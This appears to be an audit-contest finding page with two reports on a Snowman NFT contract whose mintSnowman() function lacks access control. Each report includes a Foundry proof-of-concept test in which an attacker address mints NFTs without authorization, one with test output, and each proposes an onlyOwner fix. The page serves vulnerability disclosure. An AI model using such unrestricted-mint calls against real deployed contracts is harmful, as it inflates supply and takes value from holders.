Root + Impact
Description
The mintSnowman function is publicly accessible and allows any address to mint an arbitrary number of NFTs to any address. This could lead to unauthorized minting of NFTs.
// Root cause in the codebase with @> marks to highlight the relevant section
Risk
Likelihood:
This will occur when any external actor (EOA or smart contract) discovers the contract address and sees the public interface (via a block explorer or ABI).
Since no onlyOwner, onlyAdmin, or merkle-based claim control exists, nothing stops bots, malicious actors, or curious users from mass minting Snowman NFTs on deployment or after discovering the contract.
Impact:
Unauthorized users can mint NFTs, potentially leading to inflation of the NFT supply and devaluation.
Proof of Concept
This PoC clearly demonstrates how any user (not just the contract owner) can mint NFTs using the mintSnowman() function, without constraints. By simulating the attacker with vm.prank, it shows the issue in isolation, providing an immediate and verifiable reproduction of the vulnerability.
// SPDX-License-Identifier: UNLICENSED
pragma solidity ^0.8.24;
import "forge-std/Test.sol";
import "../src/Snowman.sol"; // Adjust import based on your structure
contract AttackerMintTest is Test {
Snowman public snowman;
address public attacker = address(0xBEEF); // Simulated malicious actor
function setUp() public {
// Deploy the vulnerable Snowman contract with a dummy SVG URI
snowman = new Snowman("ipfs://fake-snowman-svg-uri");
}
function testAttackerCanMintUnlimitedNFTs() public {
// Simulate as the attacker
vm.startPrank(attacker);
// Try to mint 3 NFTs to themselves
snowman.mintSnowman(attacker, 3);
// Stop the prank
vm.stopPrank();
// Verify that attacker now owns 3 tokens
assertEq(snowman.ownerOf(0), attacker);
assertEq(snowman.ownerOf(1), attacker);
assertEq(snowman.ownerOf(2), attacker);
// Check token counter advanced correctly
assertEq(snowman.getTokenCounter(), 3);
}
}
Recommended Mitigation
Add a modifier to restrict who can call the mintSnowman function. The simplest approach is using OpenZeppelin's onlyOwner, since the contract already inherits Ownable.
function mintSnowman(address receiver, uint256 amount) external onlyOwner {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```
The contest is live. Earn rewards by submitting a finding.
Submissions are being reviewed by our AI judge. Results will be available in a few minutes.
View all submissionsThe contest is complete and the rewards are being distributed.